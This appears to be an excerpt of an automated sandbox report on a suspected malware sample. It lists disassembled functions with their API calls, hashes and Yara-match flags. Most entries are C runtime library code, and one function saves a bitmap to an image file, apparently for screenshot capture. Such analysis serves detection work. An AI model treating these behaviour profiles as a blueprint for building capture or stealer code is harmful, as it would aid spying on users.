                                                  Function 00404C39 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                  • int.LIBCPMT ref: 00404C61
                                                    • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                    • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                  • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                  Function 0301C415 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0301C426
                                                  • int.LIBCPMT ref: 0301C43D
                                                    • Part of subcall function 0301BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0301BFF9
                                                    • Part of subcall function 0301BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0301C013
                                                  • std::locale::_Getfacet.LIBCPMT ref: 0301C446
                                                  • std::_Facet_Register.LIBCPMT ref: 0301C477
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0301C48D
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0301C4AB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                  • Instruction ID: ee99ebb54650bfc668cec6ce073369031f421b64970e3526692b29f109cb7a1b
                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                  • Instruction Fuzzy Hash: A911043A8423289BDF15FBA4C840AFDBB74AF84310F140519E8167F2D0DB74CA54CB94
                                                  Function 03014EA0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03014EB1
                                                  • int.LIBCPMT ref: 03014EC8
                                                    • Part of subcall function 0301BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0301BFF9
                                                    • Part of subcall function 0301BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0301C013
                                                  • std::locale::_Getfacet.LIBCPMT ref: 03014ED1
                                                  • std::_Facet_Register.LIBCPMT ref: 03014F02
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03014F18
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03014F36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                  • String ID:
                                                  • API String ID: 2243866535-0
                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction ID: a882a1cfbee5abdc9be15c71447a949f8f568d17cf667afb1cc38025a1765ff0
                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                  • Instruction Fuzzy Hash: 0111C47AC023289BCF16EBA4C844AFDBBB4AF80710F180519E9156F2E0DB74DA54CB95
                                                  Function 03038957 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0303898A
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 03038A43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: 11@$@fB$csm
                                                  • API String ID: 3480331319-1464837749
                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction ID: 95cf552b6eb9e897ed7107fb1bca8f2627713e48e3ab4a4a60d2ef7103982ae1
                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                  • Instruction Fuzzy Hash: 1B41D934A02309DBCF10DF28C844ADEBBF9AF46314F18C196F8155B391D7329A19CB91
                                                  Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                  • String ID: 11@
                                                  • API String ID: 531285432-1785270423
                                                  • Opcode ID: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                  • Instruction ID: 5ee48cf3c78ecc5b6537ee055918bb6364c51208e2805909369ee9a6debb6cd6
                                                  • Opcode Fuzzy Hash: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                  • Instruction Fuzzy Hash: E5213075D001099FDF04EFA5DC419BEB7B8AF48718B10406AF901B7291D678AD059B65
                                                  Function 0301D677 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                  • String ID: 11@
                                                  • API String ID: 531285432-1785270423
                                                  • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                  • Instruction ID: a6ef0723e36d7092058eb371145d20e088bdf41a4b61c43760bc159ee55fa4ba
                                                  • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                  • Instruction Fuzzy Hash: DC215179A012199FDF00EF98DD81DFFB7B8EF48710F100069E901AB260D774AD119B90
                                                  Function 0042370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                    • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                  • String ID: 11@
                                                  • API String ID: 2630251706-1785270423
                                                  • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                  • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                  • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                  • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                  Function 0041CE2D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID: pScheduler
                                                  • API String ID: 3657713681-923244539
                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                  Function 0041E63D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@$pContext
                                                  • API String ID: 1990795212-1086721755
                                                  • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                  • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                  • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                  • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                  Function 0042B126 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                  • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                  • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                  • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                  Function 0303B38D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                  • Instruction ID: 12a86c76463fcef3196af7e717d55397a3bcf7e6e290be06600e38850b60c878
                                                  • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                  • Instruction Fuzzy Hash: C6718075A02216DBCB21CF99C884BBFFBBDEF47718F184269E41167290DB709941CBA1
                                                  Function 00430A64 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  • _free.LIBCMT ref: 00430B6F
                                                  • _free.LIBCMT ref: 00430B86
                                                  • _free.LIBCMT ref: 00430BA5
                                                  • _free.LIBCMT ref: 00430BC0
                                                  • _free.LIBCMT ref: 00430BD7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                  • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                  • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                  • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                  Function 03040CCB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                  • Instruction ID: 767a5963caa3ee0d278c83b8cf6d6b70882343888d41715c9756fde31afdcffd
                                                  • Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                  • Instruction Fuzzy Hash: 5D51C5B5A01705AFDB60DF29DC41BAAF7F4EF49720B1445B9E909EB250E731EA11CB40
                                                  Function 004314FB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                  • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                  Function 03041762 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction ID: 152d4ad650f78ec8487043b466758830a206fee9e601dafc91fab970e94c20e5
                                                  • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                  • Instruction Fuzzy Hash: B041B0B6A013049BCB14DF78C980AAEB7F9EF89714B1945A8D915EB381D731EA41CB80
                                                  Function 004368BD Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                  • __alloca_probe_16.LIBCMT ref: 00436942
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                  • __freea.LIBCMT ref: 004369AE
                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                  • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                  • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                  • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                  Function 0041AEE6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                    • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                  • List.LIBCMT ref: 0041AFD4
                                                  • List.LIBCMT ref: 0041AFE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                  • String ID:
                                                  • API String ID: 3281396844-0
                                                  • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                  • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                  • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                  • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                  Function 00402054 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                  • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                  • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                  • String ID:
                                                  • API String ID: 2357751836-0
                                                  • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                  • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                  • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                  • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                  Function 030150EB Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 030150C8
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 030150DC
                                                    • Part of subcall function 0301BDD3: __EH_prolog3_GS.LIBCMT ref: 0301BDDA
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 03015141
                                                  • __Getcoll.LIBCPMT ref: 03015150
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 03015160
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                  • String ID:
                                                  • API String ID: 1844465188-0
                                                  • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                  • Instruction ID: f96517384d53e5b795a0bb56f93c933fea944f9c1526e025bd72ea0eaa97feab
                                                  • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                  • Instruction Fuzzy Hash: 5821CDB5802318EFEB41EFA4C880BDDBBB0BF84310F448419D485AF280EBB49A54CB91
                                                  Function 00431F7E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                  • _free.LIBCMT ref: 00431FB8
                                                  • _free.LIBCMT ref: 00431FDF
                                                  • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                  • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                  • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                  • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                  • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                  Function 030421E5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(0301DAFC,0301DAFC,00000002,0303ED55,03043971,00000000,?,03036A25,00000002,00000000,00000000,00000000,?,0301CFAD,0301DAFC,00000004), ref: 030421EA
                                                  • _free.LIBCMT ref: 0304221F
                                                  • _free.LIBCMT ref: 03042246
                                                  • SetLastError.KERNEL32(00000000,?,0301DAFC), ref: 03042253
                                                  • SetLastError.KERNEL32(00000000,?,0301DAFC), ref: 0304225C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                  • Instruction ID: abf95574bf99d84cab7e4428f36d5e12e4d8ef5856c16dce5085f797445f75c4
                                                  • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                  • Instruction Fuzzy Hash: 5C0149FA30770477C212E7346D84E6F229DFFC2A737140978F51196280EEA08B124029
                                                  Function 00431EFA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                  • _free.LIBCMT ref: 00431F31
                                                  • _free.LIBCMT ref: 00431F59
                                                  • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                  • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                  • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                  • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                  Function 03042161 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
